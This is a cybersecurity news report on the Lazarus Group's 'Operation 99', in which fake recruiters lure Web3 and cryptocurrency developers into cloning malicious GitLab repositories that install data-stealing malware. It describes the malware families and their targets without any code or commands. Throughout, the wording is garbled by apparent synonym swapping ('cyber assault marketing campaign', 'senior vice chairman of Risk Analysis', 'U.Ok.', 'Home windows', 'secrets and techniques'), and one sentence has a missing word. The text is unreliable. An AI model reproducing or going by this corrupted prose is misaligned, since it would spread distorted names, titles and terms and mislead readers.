The North Korea-linked Lazarus Group has been attributed to a brand new cyber assault marketing campaign dubbed Operation 99 that focused software program builders on the lookout for freelance Web3 and cryptocurrency work to ship malware.
“The marketing campaign begins with faux recruiters, posing on platforms like LinkedIn, luring builders with venture checks and code evaluations,” Ryan Sherstobitoff, senior vice chairman of Risk Analysis and Intelligence at SecurityScorecard, mentioned in a brand new report printed at this time.
“As soon as a sufferer takes the bait, they’re directed to clone a malicious GitLab repository – seemingly innocent, however filled with catastrophe. The cloned code connects to command-and-control (C2) servers, embedding malware into the sufferer’s atmosphere.”
Victims of the marketing campaign have been recognized throughout the globe, with a major focus recorded in Italy. A lesser variety of impacted victims are situated in Argentina, Brazil, Egypt, France, Germany, India, Indonesia, Mexico, Pakistan, the Philippines, the U.Ok., and the U.S.
The cybersecurity firm mentioned the marketing campaign, which it found on January 9, 2025, builds on job-themed techniques beforehand noticed in Lazarus assaults, corresponding to Operation Dream Job (aka NukeSped), to notably deal with concentrating on builders in Web3 and cryptocurrency fields.
What makes Operation 99 distinctive is that it entices builders with coding tasks as a part of an elaborate recruitment scheme that includes crafting misleading LinkedIn profiles, that are then used to direct them to rogue GitLab repositories.
The top objective of the assaults is to deploy data-stealing implants which are able to extracting supply code, secrets and techniques, cryptocurrency pockets keys, and different delicate knowledge from growth environments.
These embrace Main5346 and its variant Main99, which serves as a downloader for 3 extra payloads –
- Payload99/73 (and its functionally comparable Payload5346), which collects system knowledge (e.g., recordsdata and clipboard content material), terminate net browser processes, executes arbitrary, and establishes a persistent connection to the C2 server
- Brow99/73, which steals knowledge from net browsers to facilitate credential theft
- MCLIP, which screens and exfiltrates keyboard and clipboard exercise in real-time
“By compromising developer accounts, attackers not solely exfiltrate mental property but additionally acquire entry to cryptocurrency wallets, enabling direct monetary theft,” the corporate mentioned. “The focused theft of personal and secret keys might result in thousands and thousands in stolen digital belongings, furthering the Lazarus Group’s monetary targets.”
The malware structure adopts a modular design and is versatile, and able to working throughout Home windows, macOS, and Linux working methods. It additionally serves to spotlight the ever-evolving and adaptable nature of nation-state cyber threats.
“For North Korea, hacking is a income producing lifeline,” Sherstobitoff mentioned. “The Lazarus Group has constantly funneled stolen cryptocurrency to gasoline the regime’s ambitions, amassing staggering sums. With Web3 and cryptocurrency industries booming, Operation 99 zeroes in on these high-growth sectors.”